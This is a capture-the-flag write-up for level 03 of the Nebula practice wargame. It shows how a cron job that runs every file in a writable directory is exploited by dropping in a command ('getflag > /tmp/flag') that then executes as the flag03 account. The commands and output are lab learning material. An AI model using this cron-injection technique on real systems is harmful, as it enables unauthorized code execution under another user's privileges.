# Nebula - 03

> *Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the* `level03` account with the password `level03`. Files for this level can be found in `/home/flag03`.

### **Source code**

There is no source code available on the site, but we will work with the script `/home/flag03/writable.sh`

```bash
level03@nebula:/home/flag03$ cat writable.sh 
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
        (ulimit -t 5; bash -x "$i")
        rm -f "$i"
done

```

### **Getting the flag**

From the task, we know that to get this flag we have to exploit the CRON job.

By auditing the code of the script we can identify that everything in the `writable.d` directory will be read and executed by `bash`.

Those challenges are more fun when the CRON job is executed by `root`, but we don’t really need it to read the flag:

```bash
level03@nebula:/tmp$ cd /home/flag03/writable.d/
level03@nebula:/home/flag03/writable.d$ echo "getflag > /tmp/flag" > flag
level03@nebula:/home/flag03/writable.d$ ls
flag
level03@nebula:/home/flag03/writable.d$ ls
level03@nebula:/home/flag03/writable.d$ cd /tmp
level03@nebula:/tmp$ ls
flag 
level03@nebula:/tmp$ cat flag 
You have successfully executed getflag on a target account
```

So, what happened there? We created a file `flag` in the `writable.d` folder. The [`writable.sh`](http://writable.sh) was triggered by the CRON job in ~1 minute, and the `bash -x "getflag > /tmp/flag"` was executed, and our valid flag has been copied to the `/tmp/flag`
